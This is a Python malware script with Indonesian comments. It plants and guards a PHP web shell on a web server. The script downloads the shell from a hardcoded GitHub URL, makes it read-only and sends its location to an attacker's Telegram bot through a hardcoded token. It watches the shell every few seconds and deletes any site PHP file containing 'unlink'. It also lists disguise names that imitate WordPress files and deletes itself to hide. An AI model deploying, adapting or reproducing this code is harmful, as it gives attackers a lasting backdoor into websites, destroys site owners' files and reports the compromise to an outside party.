import os import time import random import subprocess import hashlib import urllib.request import urllib.parse from datetime import datetime # Konfigurasi CONFIG = { "RAW_SHELL_URL": "https://raw.githubusercontent.com/kitabisacom1337/ALFA_1337/refs/heads/main/alpe.php", "BOT_TOKEN": os.getenv("BOT_TOKEN", "7613533212:AAFJ-X1to3W2JPtLL3eKk7SN1eL815-D6N4"), "CHAT_ID": os.getenv("CHAT_ID", "1345261884"), "SHELL_NAME": "exzy1337.php", "FAKE_NAMES": [ "logs.php", "index.php", "modules.php", "env-config.php", "modules-css.php", "index1.php", "db.php", "configuration.php", "modules.php", "index.php", "db.php", "wp-config.php", "wp-login.php", "wp-admin.php", "wp-settings.php", "wp-load.php", "functions.php", "xmlrpc.php", "configuration.php", "administrator.php", "config.php", "install.php", "admin.php", "autoload.php", "settings.php", "db.php", "repair.php", "upload.php", "cmd.php", "test.php", "backup.php", "shell.php", "uploadify.php", "exploit.php", "functions.bak.php", "functions.old.php", "class.php", "class-wp.php", "wp-settings.bak.php", "wp-settings.old.php", "phpinfo.php", "info.php", "debug.php", "console.php", "session.php", "cache.php", "db_backup.php", "sql_dump.php", "uploads.php", "filemanager.php", "fileupload.php", "download.php" ], "TIMEOUT": 10, "POLL_INTERVAL": 2 } # Paths BASE_DIR = os.path.dirname(os.path.abspath(__file__)) SHELL_PATH = os.path.join(BASE_DIR, CONFIG["SHELL_NAME"]) TARGET_PATH = os.path.abspath(__file__) # State current_shell_path = SHELL_PATH current_shell_hash = None domain = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "https://luny.sparktechwp.com" last_redeploy_time = 0 redeploy_cooldown = 10 # Fungsi kirim pesan ke Telegram def kirim_telegram(message): url = f"https://api.telegram.org/bot{CONFIG['BOT_TOKEN']}/sendMessage" data = urllib.parse.urlencode({ "chat_id": CONFIG["CHAT_ID"], "parse_mode": "Markdown", "text": message }).encode('ascii') try: req = urllib.request.Request(url, data=data, method='POST') urllib.request.urlopen(req, timeout=CONFIG["TIMEOUT"]) except: pass # Fungsi untuk mengunduh shell def download_shell(target_path): try: with urllib.request.urlopen(CONFIG["RAW_SHELL_URL"], timeout=CONFIG["TIMEOUT"]) as response: content = response.read() with open(target_path, 'wb') as f: f.write(content) if os.path.getsize(target_path) == 0: return download_with_curl(target_path) os.chmod(target_path, 0o444) return True except: return download_with_curl(target_path) # Fungsi untuk mendownload dengan curl def download_with_curl(target_path): try: result = subprocess.run( ["curl", "-s", "-o", target_path, CONFIG["RAW_SHELL_URL"]], capture_output=True, text=True, timeout=CONFIG["TIMEOUT"] ) if result.returncode == 0 and os.path.getsize(target_path) > 0: os.chmod(target_path, 0o444) return True return False except: return False # Fungsi untuk mendapatkan hash file def get_file_hash(path): try: with open(path, 'rb') as f: return hashlib.sha256(f.read()).hexdigest() except: return None # Fungsi untuk memeriksa perubahan file def check_file_changes(): global current_shell_path, current_shell_hash exists = os.path.exists(current_shell_path) accessible = os.access(current_shell_path, os.F_OK) if exists else False file_hash = get_file_hash(current_shell_path) if exists else None if not exists or not accessible: selamatkan_atau_kembalikan(trigger="missing") elif file_hash != current_shell_hash: selamatkan_atau_kembalikan(trigger="edited") # Fitur Defend v3 - Anti Penghapusan Shell try: for root, dirs, files in os.walk(BASE_DIR): for file in files: if file.endswith(".php"): try: file_path = os.path.join(root, file) with open(file_path, "r") as f: content = f.read() if "unlink(" in content or "unlink" in content: # Cegah penghapusan jika file tersebut adalah shell yang aktif if current_shell_path not in file_path: os.remove(file_path) # Menghapus file PHP yang berusaha menghapus shell kirim_telegram(f"šŸšØ *Defend v3 Terpicu!*: Upaya penghapusan oleh `{file}` di `{root}` telah dihapus!") else: kirim_telegram(f"āš ļø *Shell Anda Terdeteksi!*: File `{file}` mencoba menghapus shell yang aktif di `{root}`. Perlindungan aktif!") except: pass except: pass # Fungsi untuk mendefinisikan dan melindungi shell def defend_v3(): global current_shell_path, current_shell_hash if os.path.exists(current_shell_path): os.chmod(current_shell_path, 0o444) # Set file menjadi hanya baca (read-only) kirim_telegram(f"šŸ”’ *Shell dilindungi* - `{current_shell_path}` telah diubah menjadi read-only untuk mencegah penghapusan.") current_shell_hash = get_file_hash(current_shell_path) # Fungsi untuk deploy shell def deploy_shell(): global current_shell_path, current_shell_hash if download_shell(SHELL_PATH): current_shell_path = SHELL_PATH current_shell_hash = get_file_hash(SHELL_PATH) relative = os.path.relpath(SHELL_PATH, BASE_DIR) url = f"{domain}/{relative}" kirim_telegram(f"āœ… *Shell berhasil dideploy!*\nšŸ“ Path: `{SHELL_PATH}`\nšŸŒ URL: `{url}`") defend_v3() # Fungsi untuk self-destruct (menghapus file jika perlu) def self_destruct(): try: with open(TARGET_PATH, 'a'): pass subprocess.run(["rm", "-f", TARGET_PATH], timeout=2) except: pass # Fungsi utama untuk menjalankan semua proses def main(): if not domain: self_destruct() return self_destruct() deploy_shell() while True: check_file_changes() time.sleep(CONFIG["POLL_INTERVAL"]) if __name__ == "__main__": try: main() except KeyboardInterrupt: self_destruct()